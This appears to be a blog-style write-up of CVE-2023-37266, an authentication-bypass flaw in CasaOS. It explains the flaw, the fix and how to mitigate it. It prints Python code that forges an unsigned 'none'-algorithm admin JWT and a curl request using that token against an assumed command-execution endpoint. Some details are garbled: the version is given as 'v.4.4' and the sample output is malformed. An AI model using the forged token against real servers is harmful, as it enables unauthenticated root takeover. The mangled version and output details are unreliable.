CVE-2023-37266 - How Attackers Could Take Over Your CasaOS Server Using Fake JWTs

CasaOS is a popular open-source personal cloud system, allowing users to manage files, apps, and even run containers from an easy-to-use web interface. But in June 2023, a serious security vulnerability—CVE-2023-37266—was discovered. This bug allowed anyone, without logging in, to craft a fake authentication token (JWT) and unlock sensitive features, even running system commands as the root user.

What’s the CVE About?

Normally, CasaOS uses JWT (JSON Web Token) to manage user authentication so only authorized people can access protected functions. However, due to poor token validation, attackers could make arbitrary JWTs and fool the CasaOS backend into thinking they're an admin.

Worst of all, they can execute arbitrary commands as root—meaning full control over your server.

The vulnerability was fixed in commit 705bf1f and shipped in CasaOS v.4.4.

Exploiting CVE-2023-37266: How It Works

Let’s break down how an attacker could exploit this flaw.

JWTs Should Be Signed: CasaOS was not properly checking the signature of incoming JWTs.

2. Anyone Can Craft a JWT: So, an attacker could generate a token with any data they want and use it to authenticate.
3. APIs Grant Access: The attacker sends this token in requests to the CasaOS API and gets access to privileged features.

Here’s simple Python code (using PyJWT) to create a token

import jwt

# Crafting a JWT with admin privileges
payload = {
    "user": "admin",
    "role": "admin"
}

# Use 'none' algorithm and no signature
token = jwt.encode(payload, key='', algorithm='none')

print(f"Your evil JWT:\n{token}")

Attackers can then pass this token in the Authorization: Bearer <token> HTTP header when making API requests.

Exploit in Action

Suppose the CasaOS management API includes an endpoint to execute shell commands. With a forged token, an unauthenticated attacker could run:

curl -X POST http://your-casaos-instance:port/v1/exec \
  -H "Authorization: Bearer <evil_jwt_token>" \
  -d '{"command": "id"}'

If vulnerable, the server returns

{
  "output": "uid=(root) gid=(root) groups=(root)"
}

This means the attacker just ran a command as root—with full control!

How Was it Fixed?

The maintainers fixed this in commit 705bf1f:

> Improve JWT validation to ensure tokens are correctly signed before being trusted.

Upgrading to CasaOS v.4.4 or later Download from GitHub closes the hole.

Key fix: CasaOS now ONLY accepts JWTs that are properly signed with the backend's secret key.

What Should You Do?

1. Upgrade Immediately: Go to CasaOS .4.4 Release Page and update.

Block public access to CasaOS using firewall rules.

- Only allow trusted users on local/private networks.

More Information & References

- Original CasaOS advisory
- CasaOS GitHub repository
- CVE details at MITRE

Wrapping Up

CVE-2023-37266 is a sober reminder that authentication bugs can lead to total server compromise. If you’re running CasaOS—especially on public IPs—update immediately or protect your instance behind a firewall or VPN.

Stay safe, and keep your open-source projects up to date!

Timeline

Published on: 07/17/2023 21:15:00 UTC
Last modified on: 07/31/2023 13:05:00 UTC